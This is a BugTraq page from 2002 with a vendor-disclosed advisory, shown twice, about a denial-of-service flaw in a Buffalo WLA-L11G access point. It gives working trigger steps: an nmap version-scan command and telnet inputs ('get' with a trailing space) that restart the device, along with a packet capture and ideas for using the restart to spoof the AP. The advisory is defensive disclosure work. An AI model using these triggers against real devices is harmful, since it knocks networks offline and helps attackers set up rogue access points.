BugTraq
Back to list
|
Post reply
Buffalo AP Denial of Service
Nov 13 2002 07:39PM
Andrei Mikhailovsky (andrei arhont com)
(1 replies)
Arhont Ltd. - Information Security
Arhont Advisory by: Andrei Mikhailovsky
(www.arhont.com)
Advisory: Buffalo AP
AP Model Name: WLA-L11G Ver.2.31
Wireless Firmware: WLI-PCM-L11G Ver.6.14
Model Specific: Other versions of
Buffalo APs might be vulnerable
Manufacturer site: http://www.buffalotech.com
Manufacturer contact: info (at) buffalotech (dot) com [email concealed]
Contact Date: 25/10/2002
DETAILS:
While performing a network testing, we have found a
Buffalo Access Point (WLA-L11G Ver.2.31) vulnerable to
a Denial of Service (DoS) attack. Simply using network
scanning tool such as nmap with version grabbing
(www.insecure.org) in the following manner restarts the AP:
$ nmap -sVVV -p 80 192.168.177.250
where 192.168.177.250 is an IP address of Buffalo AP
Analysing network traffic shows the following:
14:16:14.622714 192.168.177.7.34968 >
192.168.177.250.www: S [tcp sum ok]
4001152576:4001152576(0) win 5840 <mss
1460,sackOK,timestamp 51
43788 0,nop,wscale 0> (DF) [tos 0x10] (ttl 64, id
49836, len 60)
0x0000 4510 003c c2ac 4000 4006 5bad c0a8 4d07
E..<..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be40 0000 0000
..M....P.|. (at) .. (dot) . [email concealed]
0x0020 a002 16d0 6204 0000 0204 05b4 0402 080a
....b...........
0x0030 004e 7cec 0000 0000 0103 0300
.N|.........
14:16:14.623498 192.168.177.250.www >
192.168.177.7.34968: S [tcp sum ok]
51008176:51008176(0) ack 4001152577 win 16000 <mss
1460> (ttl 3
0, id 2, len 44)
0x0000 4500 002c 0002 0000 1e06 8078 c0a8 4dfa
E..,.......x..M.
0x0010 c0a8 4d07 0050 8898 030a 52b0 ee7c be41
..M..P....R..|.A
0x0020 6012 3e80 b1e2 0000 0204 05b4 0000
`.>...........
14:16:14.623539 192.168.177.7.34968 >
192.168.177.250.www: . [tcp sum ok] 1:1(0) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49837, len 4
0)
0x0000 4510 0028 c2ad 4000 4006 5bc0 c0a8 4d07
E..(..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1
..M....P.|.A..R.
0x0020 5010 16d0 f14f 0000
P....O..
14:16:15.402518 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 1:7(6) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49838, len 4
6)
0x0000 4510 002e c2ae 4000 4006 5bb9 c0a8 4d07
E.....@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1
..M....P.|.A..R.
0x0020 5018 16d0 08b2 0000 6765 7420 0d0a
P.......get...
14:16:15.647578 192.168.177.250.www >
192.168.177.7.34968: . [tcp sum ok] 1:1(0) ack 7 win
16000 (ttl 30, id 3, len 40)
0x0000 4500 0028 0003 0000 1e06 807b c0a8 4dfa
E..(.......{..M.
0x0010 c0a8 4d07 0050 8898 030a 52b1 ee7c be47
..M..P....R..|.G
0x0020 5010 3e80 c999 0000 0000 0000 0000
P.>...........
14:16:15.647639 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49839, len 4
2)
0x0000 4510 002a c2af 4000 4006 5bbc c0a8 4d07
E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1
..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a
P....5....
14:16:16.358599 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49840, len 4
2)
0x0000 4510 002a c2b0 4000 4006 5bbb c0a8 4d07
E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1
..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a
P....5....
14:16:17.750198 arp who-has 192.168.177.250 tell
192.168.177.250
0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8
.......... (at) ..V (dot) . [email concealed]
0x0010 4dfa 0000 0000 0000 c0a8 4dfa 0000 0000
M.........M.....
0x0020 0000 0000 0000 0000 0000 0000 0000
..............
14:16:17.798596 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49841, len 4
2)
0x0000 4510 002a c2b1 4000 4006 5bba c0a8 4d07
E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1
..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a
P....5....
14:16:20.274463 arp who-has 192.168.177.7 tell
192.168.177.250
0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8
.......... (at) ..V (dot) . [email concealed]
0x0010 4dfa 0000 0000 0000 c0a8 4d07 0000 0000
M.........M.....
0x0020 0000 0000 0000 0000 0000 0000 0000
..............
14:16:20.274488 arp reply 192.168.177.7 is-at
0:4:5a:63:a4:be
0x0000 0001 0800 0604 0002 0004 5a63 a4be c0a8
..........Zc....
0x0010 4d07 0007 4006 0656 c0a8 4dfa
M... (at) ..V. (dot) M. [email concealed]
14:16:20.275495 192.168.177.250.www >
192.168.177.7.34968: FR [tcp sum ok]
51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
0x0000 4500 0028 0001 0000 1e06 807d c0a8 4dfa
E..(.......}..M.
0x0010 c0a8 4d07 0050 8898 030a 52b1 0000 0000
..M..P....R.....
0x0020 5005 0000 b4e9 0000 0000 0000 0000
P.............
Attacks can also be reproduced manually via telnet:
andrei (at) 192.168.177 (dot) 7 [email concealed]:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
GET / HTTP/1.0
Connection closed by foreign host.
and
andrei (at) 192.168.177 (dot) 7 [email concealed]:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
get
Connection closed by foreign host.
(where, there is a <space> after get; without the
<space>, the AP doesn't restart)
Impact: This vulnerability can be implemented by the
attacker to restart the AP. This might be useful if
the configuration files have been changed by the
attacker and the AP restart is required to implement
the changes. It is also possible to implement this
attack to spoof an AP and make the clients connect to
rouge or spoofed AP instead of legitimate one.
Risk Factor: Medium/High
According to the Arhont Ltd. policy, all of the found
vulnerabilities and security issues will be reported to
the manufacturer 7 days before releasing to public
domain (such as CERT and BUGTRAQ).
If you would like to get more information about this
issue, please do not hesitate to contact Arhont team.
Regards,
Andrei Mikhailovsky
Arhont Ltd.
http://www.arhont.com
GnuPG Keyserver: blackhole.pca.dfn.de
GnuPG Key: 0x178F548C
[ reply ]
[SNS Advisory No.59] Buffalo Wireless LAN Access Point Denial of Service Vulnerability (was Re: Buffalo AP Denial of Service)
Dec 03 2002 04:13AM
snsadv lac co jp
Privacy Statement
Copyright 2010, SecurityFocus
Arhont Ltd. - Information Security
Arhont Advisory by: Andrei Mikhailovsky
(www.arhont.com)
Advisory: Buffalo AP
AP Model Name: WLA-L11G Ver.2.31
Wireless Firmware: WLI-PCM-L11G Ver.6.14
Model Specific: Other versions of
Buffalo APs might be vulnerable
Manufacturer site: http://www.buffalotech.com
Manufacturer contact: info (at) buffalotech (dot) com [email concealed]
Contact Date: 25/10/2002
DETAILS:
While performing a network testing, we have found a
Buffalo Access Point (WLA-L11G Ver.2.31) vulnerable to
a Denial of Service (DoS) attack. Simply using network
scanning tool such as nmap with version grabbing
(www.insecure.org) in the following manner restarts the AP:
$ nmap -sVVV -p 80 192.168.177.250
where 192.168.177.250 is an IP address of Buffalo AP
Analysing network traffic shows the following:
14:16:14.622714 192.168.177.7.34968 >
192.168.177.250.www: S [tcp sum ok]
4001152576:4001152576(0) win 5840 <mss
1460,sackOK,timestamp 51
43788 0,nop,wscale 0> (DF) [tos 0x10] (ttl 64, id
49836, len 60)
0x0000 4510 003c c2ac 4000 4006 5bad c0a8 4d07
E..<..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be40 0000 0000
..M....P.|. (at) .. (dot) . [email concealed]
0x0020 a002 16d0 6204 0000 0204 05b4 0402 080a
....b...........
0x0030 004e 7cec 0000 0000 0103 0300
.N|.........
14:16:14.623498 192.168.177.250.www >
192.168.177.7.34968: S [tcp sum ok]
51008176:51008176(0) ack 4001152577 win 16000 <mss
1460> (ttl 3
0, id 2, len 44)
0x0000 4500 002c 0002 0000 1e06 8078 c0a8 4dfa
E..,.......x..M.
0x0010 c0a8 4d07 0050 8898 030a 52b0 ee7c be41
..M..P....R..|.A
0x0020 6012 3e80 b1e2 0000 0204 05b4 0000
`.>...........
14:16:14.623539 192.168.177.7.34968 >
192.168.177.250.www: . [tcp sum ok] 1:1(0) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49837, len 4
0)
0x0000 4510 0028 c2ad 4000 4006 5bc0 c0a8 4d07
E..(..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1
..M....P.|.A..R.
0x0020 5010 16d0 f14f 0000
P....O..
14:16:15.402518 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 1:7(6) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49838, len 4
6)
0x0000 4510 002e c2ae 4000 4006 5bb9 c0a8 4d07
E.....@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1
..M....P.|.A..R.
0x0020 5018 16d0 08b2 0000 6765 7420 0d0a
P.......get...
14:16:15.647578 192.168.177.250.www >
192.168.177.7.34968: . [tcp sum ok] 1:1(0) ack 7 win
16000 (ttl 30, id 3, len 40)
0x0000 4500 0028 0003 0000 1e06 807b c0a8 4dfa
E..(.......{..M.
0x0010 c0a8 4d07 0050 8898 030a 52b1 ee7c be47
..M..P....R..|.G
0x0020 5010 3e80 c999 0000 0000 0000 0000
P.>...........
14:16:15.647639 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49839, len 4
2)
0x0000 4510 002a c2af 4000 4006 5bbc c0a8 4d07
E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1
..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a
P....5....
14:16:16.358599 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49840, len 4
2)
0x0000 4510 002a c2b0 4000 4006 5bbb c0a8 4d07
E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1
..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a
P....5....
14:16:17.750198 arp who-has 192.168.177.250 tell
192.168.177.250
0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8
.......... (at) ..V (dot) . [email concealed]
0x0010 4dfa 0000 0000 0000 c0a8 4dfa 0000 0000
M.........M.....
0x0020 0000 0000 0000 0000 0000 0000 0000
..............
14:16:17.798596 192.168.177.7.34968 >
192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win
5840 (DF) [tos 0x10] (ttl 64, id 49841, len 4
2)
0x0000 4510 002a c2b1 4000 4006 5bba c0a8 4d07
E..*..@.@.[...M.
0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1
..M....P.|.G..R.
0x0020 5018 16d0 e435 0000 0d0a
P....5....
14:16:20.274463 arp who-has 192.168.177.7 tell
192.168.177.250
0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8
.......... (at) ..V (dot) . [email concealed]
0x0010 4dfa 0000 0000 0000 c0a8 4d07 0000 0000
M.........M.....
0x0020 0000 0000 0000 0000 0000 0000 0000
..............
14:16:20.274488 arp reply 192.168.177.7 is-at
0:4:5a:63:a4:be
0x0000 0001 0800 0604 0002 0004 5a63 a4be c0a8
..........Zc....
0x0010 4d07 0007 4006 0656 c0a8 4dfa
M... (at) ..V. (dot) M. [email concealed]
14:16:20.275495 192.168.177.250.www >
192.168.177.7.34968: FR [tcp sum ok]
51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
0x0000 4500 0028 0001 0000 1e06 807d c0a8 4dfa
E..(.......}..M.
0x0010 c0a8 4d07 0050 8898 030a 52b1 0000 0000
..M..P....R.....
0x0020 5005 0000 b4e9 0000 0000 0000 0000
P.............
Attacks can also be reproduced manually via telnet:
andrei (at) 192.168.177 (dot) 7 [email concealed]:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
GET / HTTP/1.0
Connection closed by foreign host.
and
andrei (at) 192.168.177 (dot) 7 [email concealed]:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
get
Connection closed by foreign host.
(where, there is a <space> after get; without the
<space>, the AP doesn't restart)
Impact: This vulnerability can be implemented by the
attacker to restart the AP. This might be useful if
the configuration files have been changed by the
attacker and the AP restart is required to implement
the changes. It is also possible to implement this
attack to spoof an AP and make the clients connect to
rouge or spoofed AP instead of legitimate one.
Risk Factor: Medium/High
According to the Arhont Ltd. policy, all of the found
vulnerabilities and security issues will be reported to
the manufacturer 7 days before releasing to public
domain (such as CERT and BUGTRAQ).
If you would like to get more information about this
issue, please do not hesitate to contact Arhont team.
Regards,
Andrei Mikhailovsky
Arhont Ltd.
http://www.arhont.com
GnuPG Keyserver: blackhole.pca.dfn.de
GnuPG Key: 0x178F548C
[ reply ]